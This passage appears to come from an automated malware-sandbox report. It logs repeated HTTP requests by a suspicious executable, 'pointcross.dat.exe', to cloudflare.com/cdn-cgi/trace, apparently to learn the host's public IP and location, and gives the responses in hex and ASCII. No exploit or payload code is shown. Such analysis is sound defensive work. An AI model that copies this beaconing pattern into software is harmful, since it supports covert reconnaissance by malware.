2023-11-27 09:13:10 UTC	332	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 39 3a 31 33 3a 31 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 63 39 34 30 65 65 31 39 61 38 32 30 36 61 2d 49 41 44 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 09:13:10 GMTContent-Type: text/plainTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *Server: cloudflareCF-RAY: 82c940ee19a8206a-IADX-Frame-Options: DENYX-Content-Type-Options:
2023-11-27 09:13:10 UTC	215	IN	Data Raw: 64 31 0d 0a 66 6c 3d 36 30 31 66 37 35 0a 68 3d 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 39 2e 31 34 39 2e 31 38 2e 36 30 0a 74 73 3d 31 37 30 31 30 37 36 33 39 30 2e 31 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 0a 63 6f 6c 6f 3d 49 41 44 0a 73 6c 69 76 65 72 3d 6e 6f 6e 65 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74 65 77 61 79 3d 6f 66 66 0a 72 62 69 3d 6f 66 66 0a 6b 65 78 3d 58 32 35 35 31 39 0a 0d 0a Data Ascii: d1fl=601f75h=cloudflare.comip=89.149.18.60ts=1701076390.1visit_scheme=httpsuag=Go-http-client/1.1colo=IADsliver=nonehttp=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgateway=offrbi=offkex=X25519
2023-11-27 09:13:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49757	104.16.133.229	443	6684	C:\Users\user\Desktop\pointcross.dat.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-27 09:13:13 UTC	108	OUT	GET /cdn-cgi/trace HTTP/1.1 Host: cloudflare.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2023-11-27 09:13:14 UTC	332	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 39 3a 31 33 3a 31 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 63 39 34 31 30 36 66 65 62 33 30 35 63 39 2d 49 41 44 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 09:13:14 GMTContent-Type: text/plainTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *Server: cloudflareCF-RAY: 82c94106feb305c9-IADX-Frame-Options: DENYX-Content-Type-Options:
2023-11-27 09:13:14 UTC	217	IN	Data Raw: 64 33 0d 0a 66 6c 3d 35 37 32 66 37 31 0a 68 3d 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 39 2e 31 34 39 2e 31 38 2e 36 30 0a 74 73 3d 31 37 30 31 30 37 36 33 39 34 2e 30 37 38 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 0a 63 6f 6c 6f 3d 49 41 44 0a 73 6c 69 76 65 72 3d 6e 6f 6e 65 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74 65 77 61 79 3d 6f 66 66 0a 72 62 69 3d 6f 66 66 0a 6b 65 78 3d 58 32 35 35 31 39 0a 0d 0a Data Ascii: d3fl=572f71h=cloudflare.comip=89.149.18.60ts=1701076394.078visit_scheme=httpsuag=Go-http-client/1.1colo=IADsliver=nonehttp=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgateway=offrbi=offkex=X25519
2023-11-27 09:13:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49758	104.16.133.229	443	6684	C:\Users\user\Desktop\pointcross.dat.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-27 09:13:17 UTC	108	OUT	GET /cdn-cgi/trace HTTP/1.1 Host: cloudflare.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2023-11-27 09:13:18 UTC	332	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 39 3a 31 33 3a 31 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 63 39 34 31 31 66 63 61 34 65 33 38 38 62 2d 49 41 44 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 09:13:18 GMTContent-Type: text/plainTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *Server: cloudflareCF-RAY: 82c9411fca4e388b-IADX-Frame-Options: DENYX-Content-Type-Options:
2023-11-27 09:13:18 UTC	217	IN	Data Raw: 64 33 0d 0a 66 6c 3d 36 32 36 66 31 32 0a 68 3d 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 39 2e 31 34 39 2e 31 38 2e 36 30 0a 74 73 3d 31 37 30 31 30 37 36 33 39 38 2e 30 34 38 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 0a 63 6f 6c 6f 3d 49 41 44 0a 73 6c 69 76 65 72 3d 6e 6f 6e 65 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74 65 77 61 79 3d 6f 66 66 0a 72 62 69 3d 6f 66 66 0a 6b 65 78 3d 58 32 35 35 31 39 0a 0d 0a Data Ascii: d3fl=626f12h=cloudflare.comip=89.149.18.60ts=1701076398.048visit_scheme=httpsuag=Go-http-client/1.1colo=IADsliver=nonehttp=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgateway=offrbi=offkex=X25519
2023-11-27 09:13:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49759	104.16.133.229	443	6684	C:\Users\user\Desktop\pointcross.dat.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-27 09:13:22 UTC	108	OUT	GET /cdn-cgi/trace HTTP/1.1 Host: cloudflare.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2023-11-27 09:13:22 UTC	332	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 39 3a 31 33 3a 32 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 63 39 34 31 33 39 65 38 31 37 35 38 38 61 2d 49 41 44 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 09:13:22 GMTContent-Type: text/plainTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *Server: cloudflareCF-RAY: 82c94139e817588a-IADX-Frame-Options: DENYX-Content-Type-Options:
2023-11-27 09:13:22 UTC	217	IN	Data Raw: 64 33 0d 0a 66 6c 3d 33 35 34 66 38 35 0a 68 3d 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 39 2e 31 34 39 2e 31 38 2e 36 30 0a 74 73 3d 31 37 30 31 30 37 36 34 30 32 2e 32 32 36 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 0a 63 6f 6c 6f 3d 49 41 44 0a 73 6c 69 76 65 72 3d 6e 6f 6e 65 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74 65 77 61 79 3d 6f 66 66 0a 72 62 69 3d 6f 66 66 0a 6b 65 78 3d 58 32 35 35 31 39 0a 0d 0a Data Ascii: d3fl=354f85h=cloudflare.comip=89.149.18.60ts=1701076402.226visit_scheme=httpsuag=Go-http-client/1.1colo=IADsliver=nonehttp=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgateway=offrbi=offkex=X25519
2023-11-27 09:13:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49760	104.16.133.229	443	6684	C:\Users\user\Desktop\pointcross.dat.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-27 09:13:25 UTC	108	OUT	GET /cdn-cgi/trace HTTP/1.1 Host: cloudflare.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2023-11-27 09:13:26 UTC	332	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 39 3a 31 33 3a 32 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 63 39 34 31 35 32 62 61 36 63 31 37 36 65 2d 49 41 44 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 09:13:26 GMTContent-Type: text/plainTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *Server: cloudflareCF-RAY: 82c94152ba6c176e-IADX-Frame-Options: DENYX-Content-Type-Options:
2023-11-27 09:13:26 UTC	218	IN	Data Raw: 64 34 0d 0a 66 6c 3d 31 36 66 31 31 35 35 0a 68 3d 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 39 2e 31 34 39 2e 31 38 2e 36 30 0a 74 73 3d 31 37 30 31 30 37 36 34 30 36 2e 31 39 37 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 0a 63 6f 6c 6f 3d 49 41 44 0a 73 6c 69 76 65 72 3d 6e 6f 6e 65 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74 65 77 61 79 3d 6f 66 66 0a 72 62 69 3d 6f 66 66 0a 6b 65 78 3d 58 32 35 35 31 39 0a 0d 0a Data Ascii: d4fl=16f1155h=cloudflare.comip=89.149.18.60ts=1701076406.197visit_scheme=httpsuag=Go-http-client/1.1colo=IADsliver=nonehttp=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgateway=offrbi=offkex=X25519
2023-11-27 09:13:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49761	104.16.133.229	443	6684	C:\Users\user\Desktop\pointcross.dat.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-27 09:13:29 UTC	108	OUT	GET /cdn-cgi/trace HTTP/1.1 Host: cloudflare.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2023-11-27 09:13:30 UTC	332	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 39 3a 31 33 3a 33 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 63 39 34 31 36 62 39 66 65 62 30 35 38 31 2d 49 41 44 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 09:13:30 GMTContent-Type: text/plainTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *Server: cloudflareCF-RAY: 82c9416b9feb0581-IADX-Frame-Options: DENYX-Content-Type-Options:
2023-11-27 09:13:30 UTC	217	IN	Data Raw: 64 33 0d 0a 66 6c 3d 35 37 32 66 32 30 0a 68 3d 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 39 2e 31 34 39 2e 31 38 2e 36 30 0a 74 73 3d 31 37 30 31 30 37 36 34 31 30 2e 31 37 36 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 0a 63 6f 6c 6f 3d 49 41 44 0a 73 6c 69 76 65 72 3d 6e 6f 6e 65 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74 65 77 61 79 3d 6f 66 66 0a 72 62 69 3d 6f 66 66 0a 6b 65 78 3d 58 32 35 35 31 39 0a 0d 0a Data Ascii: d3fl=572f20h=cloudflare.comip=89.149.18.60ts=1701076410.176visit_scheme=httpsuag=Go-http-client/1.1colo=IADsliver=nonehttp=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgateway=offrbi=offkex=X25519
2023-11-27 09:13:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49762	104.16.133.229	443	6684	C:\Users\user\Desktop\pointcross.dat.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-27 09:13:33 UTC	108	OUT	GET /cdn-cgi/trace HTTP/1.1 Host: cloudflare.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2023-11-27 09:13:34 UTC	332	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 39 3a 31 33 3a 33 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 63 39 34 31 38 34 36 62 63 64 30 35 65 33 2d 49 41 44 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 09:13:34 GMTContent-Type: text/plainTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *Server: cloudflareCF-RAY: 82c941846bcd05e3-IADX-Frame-Options: DENYX-Content-Type-Options:
2023-11-27 09:13:34 UTC	217	IN	Data Raw: 64 33 0d 0a 66 6c 3d 35 37 33 66 31 30 0a 68 3d 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 39 2e 31 34 39 2e 31 38 2e 36 30 0a 74 73 3d 31 37 30 31 30 37 36 34 31 34 2e 31 34 34 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 0a 63 6f 6c 6f 3d 49 41 44 0a 73 6c 69 76 65 72 3d 6e 6f 6e 65 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74 65 77 61 79 3d 6f 66 66 0a 72 62 69 3d 6f 66 66 0a 6b 65 78 3d 58 32 35 35 31 39 0a 0d 0a Data Ascii: d3fl=573f10h=cloudflare.comip=89.149.18.60ts=1701076414.144visit_scheme=httpsuag=Go-http-client/1.1colo=IADsliver=nonehttp=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgateway=offrbi=offkex=X25519
2023-11-27 09:13:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49763	104.16.133.229	443	6684	C:\Users\user\Desktop\pointcross.dat.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-27 09:13:37 UTC	108	OUT	GET /cdn-cgi/trace HTTP/1.1 Host: cloudflare.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2023-11-27 09:13:38 UTC	332	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 39 3a 31 33 3a 33 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 63 39 34 31 39 64 34 66 30 36 30 38 30 32 2d 49 41 44 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 09:13:38 GMTContent-Type: text/plainTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *Server: cloudflareCF-RAY: 82c9419d4f060802-IADX-Frame-Options: DENYX-Content-Type-Options:
2023-11-27 09:13:38 UTC	218	IN	Data Raw: 64 34 0d 0a 66 6c 3d 36 32 36 66 31 35 34 0a 68 3d 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 39 2e 31 34 39 2e 31 38 2e 36 30 0a 74 73 3d 31 37 30 31 30 37 36 34 31 38 2e 31 32 36 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 0a 63 6f 6c 6f 3d 49 41 44 0a 73 6c 69 76 65 72 3d 6e 6f 6e 65 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74 65 77 61 79 3d 6f 66 66 0a 72 62 69 3d 6f 66 66 0a 6b 65 78 3d 58 32 35 35 31 39 0a 0d 0a Data Ascii: d4fl=626f154h=cloudflare.comip=89.149.18.60ts=1701076418.126visit_scheme=httpsuag=Go-http-client/1.1colo=IADsliver=nonehttp=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgateway=offrbi=offkex=X25519
2023-11-27 09:13:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49764	104.16.133.229	443	6684	C:\Users\user\Desktop\pointcross.dat.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-27 09:13:41 UTC	108	OUT	GET /cdn-cgi/trace HTTP/1.1 Host: cloudflare.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2023-11-27 09:13:42 UTC	332	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 39 3a 31 33 3a 34 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 63 39 34 31 62 36 31 62 38 37 33 38 30 63 2d 49 41 44 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 09:13:42 GMTContent-Type: text/plainTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *Server: cloudflareCF-RAY: 82c941b61b87380c-IADX-Frame-Options: DENYX-Content-Type-Options:
2023-11-27 09:13:42 UTC	217	IN	Data Raw: 64 33 0d 0a 66 6c 3d 31 36 66 36 35 37 0a 68 3d 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 39 2e 31 34 39 2e 31 38 2e 36 30 0a 74 73 3d 31 37 30 31 30 37 36 34 32 32 2e 30 39 37 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 0a 63 6f 6c 6f 3d 49 41 44 0a 73 6c 69 76 65 72 3d 6e 6f 6e 65 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74 65 77 61 79 3d 6f 66 66 0a 72 62 69 3d 6f 66 66 0a 6b 65 78 3d 58 32 35 35 31 39 0a 0d 0a Data Ascii: d3fl=16f657h=cloudflare.comip=89.149.18.60ts=1701076422.097visit_scheme=httpsuag=Go-http-client/1.1colo=IADsliver=nonehttp=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgateway=offrbi=offkex=X25519
2023-11-27 09:13:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

